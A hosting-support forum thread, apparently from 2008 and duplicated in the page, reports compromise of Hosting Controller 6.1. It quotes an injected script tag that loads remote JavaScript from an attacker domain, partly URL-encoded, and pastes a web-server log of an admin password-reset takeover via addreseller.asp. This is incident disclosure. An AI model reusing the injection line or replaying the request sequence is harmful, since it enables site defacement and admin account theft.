Join us now!

Username
Password
Verification
	Stay logged in

Forgot Your Password? Forgot your Username? Haven't received registration validation E-mail?

User Control Panel Log out

Forums
Posts

Latest Posts

Active Posts

Recently Visited

Search Results

View More
Blog

Recent Blog Posts

View More
Photos

Recent Photos

My Favorites

View More Photo Galleries
PMs

Unread PMs

Inbox

Send New PM View More
Page Extras
Menu
- Forum Themes

Mark Thread UnreadFlat Reading Mode ❐

LockedBug in HC 6.1

Author Post Essentials Only Full Version
nitaish Premium Member 2008/03/12 22:19:46 (permalink) Bug in HC 6.1 Hello, There is a bug in the HC 6.1 version because of which all the default pages created by HC in the websites are getting injected by a script which goes as follows <script src=http://yrwap.cn/h.js></script><script src=http://%79%72%77%61%70%2E%63%6E/h.js></script><script src=http://%79%72%77%61%70%2E%63%6E/h.js></script> We request HC to look into it and fix it before it creates further problems. An ICANN Accredited Domain name Registrar - OwnRegistrar.com \| Shared Hosting \| Reseller hosting \| Dedicated server \| - QualiSpace.com Premium AntiSpam / AntiVirus gateway - SpamTermino.com Signup as a reseller and get domains only for $6.49 #1 1 Reply Related Threads
nextmill Senior Member RE: Bug in HC 6.1 2008/06/12 17:22:44 (permalink) There is a serious flaw in HC6.1 hf3.3 with post security updates (1/23/2008) that still hasn't been fixed... It was suppose to be fixed in the post hf 3.3 security fixes but was not fully fixed. Hackers continue to exploit this flaw and it seems HC doesn't care. Here is the log of a recent exploit from TODAY of one of our customer's servers. Hacker is on ip 85.9.111.21 today. These logs show the hacker exploiting the addreseller.asp to change the email address on the HCADMIN user, then gets the form to send a password change link to that email address. I WISH HC would disable the ability to request a 'sent password' for HCADMIN, probably would be 1-2 lines of code to look to see if someone is submitting such a request to check the password for 'HCADMIN' 2008-12-06 20:31:54 W3SVC3 RAPTOR9 216.115.x.x POST /hosting/addreseller.asp htype=3 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 475 802 687 2008-12-06 20:31:57 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/accountactions.asp ActionType=AddUser&hostingplantype=3&auto=1 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 553 607 1984 2008-12-06 20:34:09 W3SVC3 RAPTOR9 216.115.x.x GET /hosting/xml_addresellerresult.asp AddResult=70500010\|-\|ASP_0113\|Script_timed_out 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 500 0 64 0 588 131437 2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 114468 2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 101843 2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 87000 2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /Check_Password.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/ 216.115.x.x:8077 302 0 0 433 713 33765 2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /hosting/addreseller.asp htype=3 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 475 802 12203 2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 511 748 10187 2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x GET /main.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/ 216.115.x.x:8077 200 0 0 1357 579 671 2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/accountactions.asp ActionType=AddUser&hostingplantype=3&auto=1 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 553 607 703 2008-12-06 20:34:16 W3SVC3 RAPTOR9 216.115.x.x GET /Header.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/main.asp 216.115.x.x:8077 200 0 0 2308 589 4125 2008-12-06 20:34:17 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/AccountManager.asp UpdateResult=70500141&iconwebsite= 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 200 0 0 13455 597 5109 2008-12-06 20:34:27 W3SVC3 RAPTOR9 216.115.x.x POST /Check_Password.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/ 216.115.x.x:8077 302 0 1236 0 713 90531 2008-12-06 20:36:24 W3SVC3 RAPTOR9 216.115.x.x GET /hosting/xml_addresellerresult.asp AddResult=70500010\|-\|ASP_0113\|Script_timed_out 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 500 0 0 680 588 131000 2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /Header.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Header.asp 216.115.x.x:8077 200 0 0 2308 531 129484 2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/bgDotted.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 200 0 0 296 591 453 2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/spacer.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 200 0 0 290 589 453 2008-12-06 20:36:29 W3SVC3 RAPTOR9 216.115.x.x GET /space.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 404 0 64 0 562 3578 2008-12-06 20:36:29 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/angle.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Header.asp 216.115.x.x:8077 200 0 0 345 586 2781 2008-12-06 20:36:30 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/TopImage.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 200 0 0 1085 591 609 2008-12-06 20:36:30 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/AccountManager.asp UpdateResult=70500141&iconwebsite= 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/accounts/AccountManager.asp?UpdateResult=70500141&iconwebsite= 216.115.x.x:8077 200 0 0 13455 635 132968 #2

Author

Post

Essentials Only Full Version

nitaish

Premium Member

2008/03/12 22:19:46 (permalink)

Bug in HC 6.1

Hello,

There is a bug in the HC 6.1 version because of which all the default pages created by HC in the websites are getting injected by a script which goes as follows

<script src=http://yrwap.cn/h.js></script><script src=http://%79%72%77%61%70%2E%63%6E/h.js></script><script src=http://%79%72%77%61%70%2E%63%6E/h.js></script>

We request HC to look into it and fix it before it creates further problems.

An ICANN Accredited Domain name Registrar - OwnRegistrar.com
| Shared Hosting | Reseller hosting | Dedicated server | - QualiSpace.com
Premium AntiSpam / AntiVirus gateway - SpamTermino.com
Signup as a reseller and get domains only for $6.49

1 Reply Related Threads

nextmill

Senior Member

RE: Bug in HC 6.1 2008/06/12 17:22:44 (permalink)

There is a serious flaw in HC6.1 hf3.3 with post security updates (1/23/2008) that still hasn't been fixed... It was suppose to be fixed in the post hf 3.3 security fixes but was not fully fixed. Hackers continue to exploit this flaw and it seems HC doesn't care.

Here is the log of a recent exploit from TODAY of one of our customer's servers. Hacker is on ip 85.9.111.21 today. These logs show the hacker exploiting the addreseller.asp to change the email address on the HCADMIN user, then gets the form to send a password change link to that email address. I WISH HC would disable the ability to request a 'sent password' for HCADMIN, probably would be 1-2 lines of code to look to see if someone is submitting such a request to check the password for 'HCADMIN'

2008-12-06 20:31:54 W3SVC3 RAPTOR9 216.115.x.x POST /hosting/addreseller.asp htype=3 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 475 802 687
2008-12-06 20:31:57 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/accountactions.asp ActionType=AddUser&hostingplantype=3&auto=1 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 553 607 1984
2008-12-06 20:34:09 W3SVC3 RAPTOR9 216.115.x.x GET /hosting/xml_addresellerresult.asp AddResult=70500010|-|ASP_0113|Script_timed_out 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 500 0 64 0 588 131437
2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 114468
2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 101843
2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 87000
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /Check_Password.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/ 216.115.x.x:8077 302 0 0 433 713 33765
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /hosting/addreseller.asp htype=3 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 475 802 12203
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 511 748 10187
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x GET /main.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/ 216.115.x.x:8077 200 0 0 1357 579 671
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/accountactions.asp ActionType=AddUser&hostingplantype=3&auto=1 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 553 607 703
2008-12-06 20:34:16 W3SVC3 RAPTOR9 216.115.x.x GET /Header.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/main.asp 216.115.x.x:8077 200 0 0 2308 589 4125
2008-12-06 20:34:17 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/AccountManager.asp UpdateResult=70500141&iconwebsite= 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 200 0 0 13455 597 5109
2008-12-06 20:34:27 W3SVC3 RAPTOR9 216.115.x.x POST /Check_Password.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/ 216.115.x.x:8077 302 0 1236 0 713 90531
2008-12-06 20:36:24 W3SVC3 RAPTOR9 216.115.x.x GET /hosting/xml_addresellerresult.asp AddResult=70500010|-|ASP_0113|Script_timed_out 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 500 0 0 680 588 131000
2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /Header.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Header.asp 216.115.x.x:8077 200 0 0 2308 531 129484
2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/bgDotted.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 200 0 0 296 591 453
2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/spacer.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 200 0 0 290 589 453
2008-12-06 20:36:29 W3SVC3 RAPTOR9 216.115.x.x GET /space.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 404 0 64 0 562 3578
2008-12-06 20:36:29 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/angle.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Header.asp 216.115.x.x:8077 200 0 0 345 586 2781
2008-12-06 20:36:30 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/TopImage.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 200 0 0 1085 591 609
2008-12-06 20:36:30 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/AccountManager.asp UpdateResult=70500141&iconwebsite= 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/accounts/AccountManager.asp?UpdateResult=70500141&iconwebsite= 216.115.x.x:8077 200 0 0 13455 635 132968

Jump to: